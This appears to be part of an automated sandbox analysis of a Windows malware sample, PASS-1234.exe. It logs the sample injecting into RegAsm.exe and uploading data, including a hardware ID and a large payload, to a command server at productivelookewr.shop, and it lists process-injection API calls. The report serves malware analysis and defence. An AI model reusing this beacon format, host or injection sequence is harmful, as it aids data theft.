6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 40 77 61 72 65
        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"037BC13205B6CC8D12C62414C1B52377--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--@ware
        2024-04-21 07:04:59 UTC5114OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4
        Data Ascii: `M?lrQMn 64F6(X&7~
        2024-04-21 07:05:00 UTC802INHTTP/1.1 200 OK
        Date: Sun, 21 Apr 2024 07:05:00 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Set-Cookie: PHPSESSID=a4npv8gf6j0ee9ve6a1ipfd612; expires=Thu, 15-Aug-2024 00:51:39 GMT; Max-Age=9999999; path=/
        Expires: Thu, 19 Nov 1981 08:52:00 GMT
        Cache-Control: no-store, no-cache, must-revalidate
        Pragma: no-cache
        CF-Cache-Status: DYNAMIC
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TifGGwEPg8x3yt9JBFS8KYWhCYVQm9P9R1VCBHb5i4VzZ5uB9ICepuywDt7g9GHPxpRKja5vSIlJ%2F4ECbnnWTAoE36448TW66mmdCCh9fK%2F2ucrPsvrqThw1IGLlWRPhLxgzqkEZgF0m"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        Server: cloudflare
        CF-RAY: 877b85ed0a2912de-ATL
        alt-svc: h3=":443"; ma=86400
        2024-04-21 07:05:00 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
        Data Ascii: fok 81.181.57.52
        2024-04-21 07:05:00 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        5192.168.2.449747104.21.11.2504435104C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        TimestampBytes transferredDirectionData
        2024-04-21 07:05:00 UTC287OUTPOST /api HTTP/1.1
        Connection: Keep-Alive
        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
        Content-Length: 7092
        Host: productivelookewr.shop
        2024-04-21 07:05:00 UTC7092OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 33 37 42 43 31 33 32 30 35 42 36 43 43 38 44 31 32 43 36 32 34 31 34 43 31 42 35 32 33 37 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 40 77 61 72 65
        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"037BC13205B6CC8D12C62414C1B52377--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--@ware
        2024-04-21 07:05:00 UTC806INHTTP/1.1 200 OK
        Date: Sun, 21 Apr 2024 07:05:00 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Set-Cookie: PHPSESSID=msi1kuq4dtacl9upk0o9fsjfq0; expires=Thu, 15-Aug-2024 00:51:39 GMT; Max-Age=9999999; path=/
        Expires: Thu, 19 Nov 1981 08:52:00 GMT
        Cache-Control: no-store, no-cache, must-revalidate
        Pragma: no-cache
        CF-Cache-Status: DYNAMIC
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FPUZF4gi2W4nf3GM8DHhByL%2FeLICGjd%2FAP9KpwL0bXvp%2BeWgoQMVqxz4V3NtmC0sKSZA3PEVSPOkJEEScmwxhUAB9KT5tViS8VHkB1QMS6glUgujveCEDe%2FjVAUDz5Rk8btxHHC2LtWF"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        Server: cloudflare
        CF-RAY: 877b85f25f1d8bba-ATL
        alt-svc: h3=":443"; ma=86400
        2024-04-21 07:05:00 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
        Data Ascii: fok 81.181.57.52
        2024-04-21 07:05:00 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        6192.168.2.449748104.21.11.2504435104C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        TimestampBytes transferredDirectionData
        2024-04-21 07:05:01 UTC287OUTPOST /api HTTP/1.1
        Connection: Keep-Alive
        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
        Content-Length: 1417
        Host: productivelookewr.shop
        2024-04-21 07:05:01 UTC1417OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 33 37 42 43 31 33 32 30 35 42 36 43 43 38 44 31 32 43 36 32 34 31 34 43 31 42 35 32 33 37 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 40 77 61 72 65
        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"037BC13205B6CC8D12C62414C1B52377--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--@ware
        2024-04-21 07:05:01 UTC812INHTTP/1.1 200 OK
        Date: Sun, 21 Apr 2024 07:05:01 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Set-Cookie: PHPSESSID=kimjhdh000telsilpnvqtd6lmb; expires=Thu, 15-Aug-2024 00:51:40 GMT; Max-Age=9999999; path=/
        Expires: Thu, 19 Nov 1981 08:52:00 GMT
        Cache-Control: no-store, no-cache, must-revalidate
        Pragma: no-cache
        CF-Cache-Status: DYNAMIC
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oQk571EPJ6ARhpk%2F7vmEjyMsGmEfljfDE9EUzUKjt2VkJ65jAd7wdbRcEJzRcS5ELfJr%2BN2Ttjam%2FkKzM%2FQ208E9Py4k%2Fgw6NQCw7VkgYmVDfOQmviTC8m6wTiiFh2v6LzD8%2BaomYwH%2F"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        Server: cloudflare
        CF-RAY: 877b85f70ffc7b90-ATL
        alt-svc: h3=":443"; ma=86400
        2024-04-21 07:05:01 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
        Data Ascii: fok 81.181.57.52
        2024-04-21 07:05:01 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        7192.168.2.449749104.21.11.2504435104C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        TimestampBytes transferredDirectionData
        2024-04-21 07:05:02 UTC289OUTPOST /api HTTP/1.1
        Connection: Keep-Alive
        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
        Content-Length: 584469
        Host: productivelookewr.shop
        2024-04-21 07:05:02 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 33 37 42 43 31 33 32 30 35 42 36 43 43 38 44 31 32 43 36 32 34 31 34 43 31 42 35 32 33 37 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 40 77 61 72 65
        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"037BC13205B6CC8D12C62414C1B52377--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--@ware
        2024-04-21 07:05:02 UTC15331OUTData Raw: 16 ca 52 a3 cf 29 52 ce 97 b1 7f 62 ec 50 7e f3 3f be 6a 51 8c 0b 1b d2 2f 26 1d bf b6 6a d6 bb ab 73 d8 16 19 15 55 c9 db 26 b3 dc 9c 26 ba f5 8a 9a 54 e2 a0 bd 4f e8 62 96 2a 36 a2 22 fe 38 13 78 1f 84 ca 2e d5 cc 94 5e e3 c7 0d 0c 6e e5 15 12 1f c3 5e ea 84 81 12 a5 4a 04 fd 79 7a a3 a1 36 66 e8 c8 d9 49 ed f0 bf 3e ee 13 b5 c1 dc 6e e9 27 38 f3 3f 2f 3c 38 b5 66 3e 23 d3 55 f5 20 5b 1d cd 9e 56 37 65 bf 7f 9f 0a d1 77 98 0a d9 d0 57 cd 3b d8 54 3d 51 0d 4a 92 f6 84 14 de 9d 69 e9 e2 3c 93 5f 81 1b e4 ef 81 b6 a0 ea e8 de 84 d3 9c 1d b3 85 26 61 ee 87 52 f6 e2 a6 19 43 2e 6e 3e ca 5d ab bc 21 bc 0d e7 f3 d7 d7 6b 0e 52 cf b3 d3 e7 7d 62 84 01 d0 8b a0 5a a3 52 68 96 45 62 f4 9f e2 dd ab 27 fd 96 bf 84 e7 80 1e 61 df db ba 4f 40 4f 35 60 07 ef 5e 4f 3e
        Data Ascii: R)RbP~?jQ/&jsU&&TOb*6"8x.^n^Jyz6fI>n'8?/<8f>#U [V7ewW;T=QJi<_&aRC.n>]!kR}bZRhEb'aO@O5`^O>
        2024-04-21 07:05:02 UTC15331OUTData Raw: 0a 93 00 b9 99 c0 1e 28 cf d9 e1 27 0f 54 31 8d 5b b1 44 c2 46 2a 08 b7 81 fc ff ed 3d 24 e1 c7 30 76 41 bd a6 25 b9 37 5e 51 6c 14 d8 93 9a 5e 36 42 c1 f3 a3 71 1c a0 f8 a9 18 ec cf 9b 29 ed be f1 e4 30 41 25 20 bd 8b 29 37 9b ad 63 e9 5c 67 6d 84 12 f5 b2 78 1e cd c1 20 d8 4d 59 1b ca 7b a1 10 4d 1f da 02 8b 1e 87 cc 2e 36 48 0a ea ba 9d 7f af 74 c1 6f 5f a4 90 da eb 54 1a e1 3b 2d 33 03 4e e0 f3 85 a0 93 17 55 7f df 61 2b 09 22 99 84 41 74 93 dd e5 3c ce 15 31 6c 66 2b cc 2f f6 7a 3d 09 e0 9b b4 be b3 d9 fd 55 40 b9 a6 12 ab b9 e6 d5 f5 34 d4 ce 65 63 e0 31 ac cc e9 36 83 6e 9d 46 cc ef e5 71 1a 6d 85 a8 fb 30 27 25 cf 93 3a 18 91 5e bc 31 84 e7 11 df 78 44 5d 21 de 87 0e 95 e2 ec f3 0c e0 f8 bd f9 87 40 f9 bf c8 c0 d8 9c 2f 8e da fb a2 eb 87 b7 4b 6f
        Data Ascii: ('T1[DF*=$0vA%7^Ql^6Bq)0A% )7c\gmx MY{M.6Hto_T;-3NUa+"At<1lf+/z=U@4ec16nFqm0'%:^1xD]!@/Ko
        2024-04-21 07:05:02 UTC15331OUTData Raw: 77 05 65 a0 8a 5c 5e 1f d2 87 0c 5f 77 97 4e 1c 30 8c 0a df 0b 8e 1b 20 ce 18 17 f1 45 07 dd c3 30 56 47 9a ef 6f 98 24 1a 83 95 94 8b ac 3f 7a 06 fd c7 52 87 66 9e 87 af 40 39 c8 e0 8b 0e c4 ae c4 ed ea 23 77 5f 35 df b2 36 7e c4 b0 e9 08 f2 00 82 90 73 cf 39 bb 02 c5 df 9d 55 4b 83 b5 2a 05 9c d3 03 42 64 5f ce 51 f6 18 0a 84 67 b7 d4 4a 64 5c fe 2f 7e 7f dc b9 e1 23 7d e1 cb 27 ef 0b 16 9d 03 5b 6c e6 05 cf d7 dc 1d 08 a0 04 78 6d 55 ee c1 56 77 5f b0 3f 1f 55 2d aa 5d 2a 00 0e 25 10 d9 90 eb bc b4 89 db 42 a9 fc 36 91 52 59 90 c7 22 fa d5 dd 89 8a 17 4e a9 f0 bd bd 09 3c e7 cb 4c 88 a6 80 b4 65 18 d9 cf 0d 6f a6 d0 37 22 ef 70 4e 42 bc 09 f0 c8 a5 0c 80 fc 4e 10 bf 9b f9 72 79 f4 3c 41 f4 39 c3 40 4f 5d f2 3e a4 b6 8e 00 9a 01 1e 50 88 8b 65 b5 0d b0
        Data Ascii: we\^_wN0 E0VGo$?zRf@9#w_56~s9UK*Bd_QgJd\/~#}'[lxmUVw_?U-]*%B6RY"N<Leo7"pNBNry<A9@O]>Pe
        2024-04-21 07:05:02 UTC15331OUTData Raw: 5b 29 07 11 3a 54 9b 7a 15 30 fa 5b 3d 98 5e 20 b5 be e2 ca 93 f6 d6 ba 0e f3 13 4e 5d f5 87 d1 50 9c 93 c8 6b 6f 9e 50 78 ad 69 8d 47 a9 29 45 45 b2 07 84 eb f9 72 45 70 8a 7e 4a 07 b9 b9 d1 21 8e d0 2b d9 75 d2 ca e7 a5 35 1a 56 2c a9 39 d7 54 e4 b7 9b c4 18 34 d4 55 75 2b a1 be 33 f2 9e 98 c5 5e 11 97 09 3e 54 6b 25 09 4e dc 68 bc b4 e3 2d 30 e7 b8 37 9a ed 08 7d ed 87 cf f7 d7 cf 6c 8e fc e8 d3 93 62 cb 6b 34 d2 66 5a f6 6b 8f 46 c4 c6 a4 31 78 42 a1 78 79 d7 2f f7 2b 57 cb 54 00 cd 55 65 70 7a 09 32 ab 0e b7 cb 51 51 c5 cf 87 b6 af ac f9 8d b6 6d 58 56 b4 ac bd de 74 8b 8b ac 5b 57 3b c8 93 a8 a2 32 d0 b8 11 ef 71 48 24 cd 90 8b da 06 ec 4d f3 34 43 7f 8e 8e 72 db 80 16 04 ff 7d 4f c5 61 92 69 05 27 e4 47 b4 68 f3 dd c1 55 ef 74 92 43 5e 2d 57 86 d3
        Data Ascii: [):Tz0[=^ N]PkoPxiG)EErEp~J!+u5V,9T4Uu+3^>Tk%Nh-07}lbk4fZkF1xBxy/+WTUepz2QQmXVt[W;2qH$M4Cr}Oai'GhUtC^-W
        2024-04-21 07:05:02 UTC15331OUTData Raw: 73 b3 c7 e2 e7 89 f5 d1 2e 9f aa 43 95 7e 2b be e8 df 6e bb 8f eb 06 b0 bc 52 b1 36 f0 64 db 2a 3c 88 38 cc b4 e8 56 79 9d 96 23 b1 29 26 3d 1d 52 b2 85 dd da 9b 32 62 b1 37 f3 06 be ac c1 44 66 02 9a 1f be c7 08 5c 74 95 0f d5 77 6e ad 31 f6 c4 88 9c a9 42 e0 bc 54 72 cc a2 78 6b c8 e3 d4 b1 d9 e4 6a 87 03 5e 13 7d 6a 85 e9 05 a2 33 64 a4 f9 24 df f7 22 5f c1 be 18 2f 75 9d ec 5d ca ea 18 55 c0 0b 89 8a 32 d7 e6 53 0b b1 fd fe 99 2e 36 93 02 87 75 9a bd 7d b7 f6 09 25 27 ec cd d3 e1 f2 e9 25 42 46 9e a0 f8 d0 c8 0e 90 b9 70 8e d9 c0 38 74 d9 23 d6 14 cb 9a fa 58 f0 a9 b2 0b 72 4b 09 13 40 8e b0 23 7e c5 3f 21 d2 08 d8 c5 5c 9e a9 81 69 a0 46 25 6c 72 7a 26 a7 19 07 f6 ab b5 db c3 8f c1 8c 62 f5 7f 8c 92 d6 e0 c9 d6 2b 3c 81 7b 01 0b aa f2 bd 48 a4 f9 91
        Data Ascii: s.C~+nR6d*<8Vy#)&=R2b7Df\twn1BTrxkj^}j3d$"_/u]U2S.6u}%'%BFp8t#XrK@#~?!\iF%lrz&b+<{H
        2024-04-21 07:05:02 UTC15331OUTData Raw: e4 ce 3d 2a c6 7b 85 0f 1f 4e 1b 43 34 05 db ec 33 97 3e 5d fe 37 db 21 7f 47 e9 4a 8b e1 b3 fe bb 55 c6 a5 73 5d fd 7f 5f b9 5b fa ad f6 9f 57 77 ca f6 95 2e 4d ea ee 26 70 7b 5b ff ae e2 fe 19 de 43 d8 58 4a 6b c5 2e be 52 06 3d 69 02 83 14 18 16 11 30 a9 da bc 2e 0a d2 18 60 b1 6e fc f7 21 90 8d 82 99 da 99 5a 38 0b 40 c8 86 50 08 84 38 58 17 87 72 5e 0f a8 fd 3a 8d e4 85 52 70 72 cb ec 83 3d 06 08 5e b8 28 7e 78 3f 21 6b f3 62 7f fa 47 8d ef 3b 45 4c d1 e1 30 fc ac e9 f2 72 77 77 e5 9f 85 ab a2 a9 61 6c c3 1c b3 0f 31 2c 6f ef 0d f7 17 8f 20 52 86 17 fd 10 98 b5 f6 16 06 22 82 d8 16 c9 ed e6 88 bc e5 f5 92 47 cd b7 2f 8b 6a e2 79 29 b6 ff e8 d2 c3 0b 9e f8 b6 7f e0 55 79 a8 4b 0e 96 87 ee 94 82 20 0c 7c 08 83 7f b7 0b 2f 80 f8 33 95 9e 2d 68 33 56 e5
        Data Ascii: =*{NC43>]7!GJUs]_[Ww.M&p{[CXJk.R=i0.`n!Z8@P8Xr^:Rpr=^(~x?!kbG;EL0rwwal1,o R"G/jy)UyK |/3-h3V
        2024-04-21 07:05:02 UTC15331OUTData Raw: e2 a5 9d f7 40 f4 0c 2b 75 78 f0 1d b7 0d a5 35 1f 94 ec 2b 51 39 89 7c b4 b0 16 92 71 b4 ca 9f 9d 0c e2 86 18 61 46 ac 82 f8 cd 49 7e 30 c2 b7 4a ba 33 71 74 a3 2f 23 e7 3f d7 f2 bb 8c e0 62 d6 cd bb 06 73 11 f3 4a 77 b8 39 82 83 05 5f 76 a7 fd 30 b9 6f b7 e1 bd 58 da 96 a6 94 d2 1a 5a 53 e1 72 e9 d2 e6 26 9b c5 b9 1f 6f c6 d1 67 1c 9d 5b b6 08 9c 90 82 7b 2d 24 ba 01 35 46 e2 7f c1 63 36 b8 9c f9 98 c0 b2 1c 39 12 c9 99 2d 9f 70 75 19 9c 29 5f ee 5e e1 20 15 15 43 ca d8 2c 94 16 96 36 99 f2 d4 bf 64 41 09 b7 a6 29 10 83 b1 e4 23 f1 59 96 36 11 24 09 59 bf 08 e7 06 90 7a 15 5b 3b 2c 2a dc 7f 2f 28 b4 56 52 8e 10 12 8b be 31 e2 08 32 9a 1b 9c 73 c0 66 68 04 da 75 ad 16 e6 7d c9 b8 84 c5 c7 bf 7f 2c 08 0f 0b 42 7f d2 e8 ee c1 9f 85 18 ab fe 33 5b 13 fe a7
        Data Ascii: @+ux5+Q9|qaFI~0J3qt/#?bsJw9_v0oXZSr&og[{-$5Fc69-pu)_^ C,6dA)#Y6$Yz[;,*/(VR12sfhu},B3[
        2024-04-21 07:05:02 UTC15331OUTData Raw: 69 43 e7 a1 1c 1a 12 b4 88 cd ff c9 28 24 97 a1 82 2e 90 dc 48 b0 ca c9 df 33 c7 a5 a9 1f 13 75 46 57 2f ba 25 06 61 ba 82 be d6 30 c1 ca ee 19 9b 7a fb b6 75 c7 53 bf fe d4 d5 fe bd 2d c8 2e 7f 81 47 14 1d 79 33 21 e4 dd 08 ca eb d2 e8 a4 e5 1b 61 70 12 da ab 35 6d f4 59 75 8a 50 c0 c2 b7 0c ca cc c2 2e 4c 8d 13 f9 26 6a 17 ea db 2a 4d 8e b0 ec 4f bd 06 bc 7e 24 ec 8f e0 e7 18 a0 9b 0b 2d a3 18 9c b2 3c b4 0b 5f 7e 82 9a c7 c6 40 3e 95 c8 26 45 57 dd 45 db d1 b3 8d 00 0e 2b b5 8d 14 db 9d b2 8b a7 da 2a 38 5a 82 35 c0 42 bf d6 5f bc 72 d9 4f 3b ba ee f6 10 19 96 6f 80 30 78 bc 90 e2 e5 b7 2a ca f7 1a ec 75 67 76 ad bd 50 15 7a 6c ac 73 3f 2a fd 02 eb 08 52 75 56 03 9f ba 6e 9b b7 f1 cc 0f 6f d3 cd 8f 53 3d 9f c7 52 3c fc de 15 d0 32 70 06 8b e3 23 1b 27
        Data Ascii: iC($.H3uFW/%a0zuS-.Gy3!ap5mYuP.L&j*MO~$-<_~@>&EWE+*8Z5B_rO;o0x*ugvPzls?*RuVnoS=R<2p#'
        2024-04-21 07:05:02 UTC15331OUTData Raw: cf 2a cb d1 57 61 35 87 91 a0 d6 fe ba a6 3d 74 e0 2a 2b 5f 95 ef 10 d3 ca 3e 3b 68 e5 3c ae 77 3a 45 1d aa fa 46 2e 81 2c 2b 65 30 b3 75 c6 d0 46 f5 14 19 99 e6 d0 46 45 8d f2 5c 33 61 4e ab 9b 76 fe d9 6f 7d 49 a8 36 89 e2 34 19 41 29 c3 bc 12 71 c8 bb 4c ae 0d 93 85 b6 c8 7c aa 14 02 22 76 45 81 84 a3 2c ce ba ff 18 91 dd 17 d3 1e 5a 8a 6b ae 0b c8 7f c5 40 e7 ec 52 2c ff 77 9c 94 fd 51 69 ed 9b 1c ed db f2 e9 01 b6 88 72 04 83 3c ff eb 22 ae 30 d9 8a 59 e3 dd 8f 52 dd d3 1f 52 24 dd a7 3b b5 cc 72 a8 cb 8a b4 af 7d a7 52 4e 60 fd c8 4c 29 2d 3a 4f 6c fa 56 de ad 1c 56 e8 a7 2d d9 ff 4e 98 39 31 bf 1d 90 9c 62 43 71 5f 2d 4e 85 0f fc eb 65 b0 67 f9 43 dd ec 8b d9 c8 f7 d2 8d 5e e1 2f 17 ab f5 66 dc 95 67 2d ff 41 9f fd 07 ed 1a 21 35 5b 2d da b1 f6 8d
        Data Ascii: *Wa5=t*+_>;h<w:EF.,+e0uFFE\3aNvo}I64A)qL|"vE,Zk@R,wQir<"0YRR$;r}RN`L)-:OlVV-N91bCq_-NegC^/fg-A!5[-
        2024-04-21 07:05:04 UTC804INHTTP/1.1 200 OK
        Date: Sun, 21 Apr 2024 07:05:04 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Set-Cookie: PHPSESSID=sa7nqhkrn7re3c5bhvnaqj7s3t; expires=Thu, 15-Aug-2024 00:51:42 GMT; Max-Age=9999999; path=/
        Expires: Thu, 19 Nov 1981 08:52:00 GMT
        Cache-Control: no-store, no-cache, must-revalidate
        Pragma: no-cache
        CF-Cache-Status: DYNAMIC
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8QK%2FBuKONmG1KAQR8wkGONUM1BoosZwgIbISZJxXKFexLmrere302XsiNjLAwQec0Fa8rkCkNtTrwY5ZQxUTn3HUIc8C6sTbJNPAzCY0XlN1xlLcbLEvYrFB6z%2BgOs%2BWtR1wGrObRT0G"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        Server: cloudflare
        CF-RAY: 877b85fdfe247b99-ATL
        alt-svc: h3=":443"; ma=86400


        Click to jump to process

        Click to jump to process

        Click to dive into process behavior distribution

        Click to jump to process

        Target ID:0
        Start time:09:04:54
        Start date:21/04/2024
        Path:C:\Users\user\Desktop\PASS-1234.exe
        Wow64 process (32bit):true
        Commandline:"C:\Users\user\Desktop\PASS-1234.exe"
        Imagebase:0xd00000
        File size:1'229'424 bytes
        MD5 hash:91A6507A51DDCF98F542E89C58B9A17E
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:low
        Has exited:true

        Target ID:1
        Start time:09:04:54
        Start date:21/04/2024
        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        Wow64 process (32bit):true
        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        Imagebase:0xe60000
        File size:65'440 bytes
        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Reset < >

          Execution Graph

          Execution Coverage:0.4%
          Dynamic/Decrypted Code Coverage:15.1%
          Signature Coverage:24.5%
          Total number of Nodes:53
          Total number of Limit Nodes:3
          execution_graph 50562 d85599 50565 d852d6 50562->50565 50566 d85303 50565->50566 50567 d85315 50565->50567 50582 d853d8 GetModuleHandleW 50566->50582 50570 d85352 50567->50570 50575 d85392 50567->50575 50569 d85308 50569->50567 50583 d85455 GetModuleHandleExW 50569->50583 50574 d85367 50589 d8542b 50575->50589 50578 d853b0 50580 d85455 3 API calls 50578->50580 50579 d853a0 GetCurrentProcess TerminateProcess 50579->50578 50581 d853b8 ExitProcess 50580->50581 50582->50569 50584 d85494 GetProcAddress 50583->50584 50585 d854b5 50583->50585 50584->50585 50588 d854a8 50584->50588 50586 d854bb FreeLibrary 50585->50586 50587 d85314 50585->50587 50586->50587 50587->50567 50588->50585 50590 d85430 50589->50590 50591 d8539c 50590->50591 50592 d85435 GetPEB 50590->50592 50591->50578 50591->50579 50592->50591 50593 e129c0 50595 e129c5 50593->50595 50596 e129fd 50595->50596 50596->50596 50597 e12b0b CreateProcessA VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 50596->50597 50597->50596 50598 e12bda WriteProcessMemory 50597->50598 50599 e12c1f 50598->50599 50600 e12c61 WriteProcessMemory Wow64SetThreadContext ResumeThread 50599->50600 50601 e12c24 WriteProcessMemory 50599->50601 50601->50599 50602 d9889b GetPEB 50603 d988b5 50602->50603 50604 d8a83d 50607 d8a688 50604->50607 50608 d8a6b6 50607->50608 50611 d8a6b2 50607->50611 50608->50611 50614 d8a58b 50608->50614 50612 d8a6d0 GetProcAddress 50612->50611 50613 d8a6e0 50612->50613 50613->50611 50620 d8a59c 50614->50620 50615 d8a632 50615->50611 50615->50612 50616 d8a5ba LoadLibraryExW 50617 d8a639 50616->50617 50618 d8a5d5 GetLastError 50616->50618 50617->50615 50619 d8a64b FreeLibrary 50617->50619 50618->50620 50619->50615 50620->50615 50620->50616 50621 d8a608 LoadLibraryExW 50620->50621 50621->50617 50621->50620 50622 d1192e 50624 d1194b 50622->50624 50623 d11966 VirtualProtect 50625 d11997 50623->50625 50624->50623 50626 d119ae CreateRemoteThread WaitForSingleObjectEx 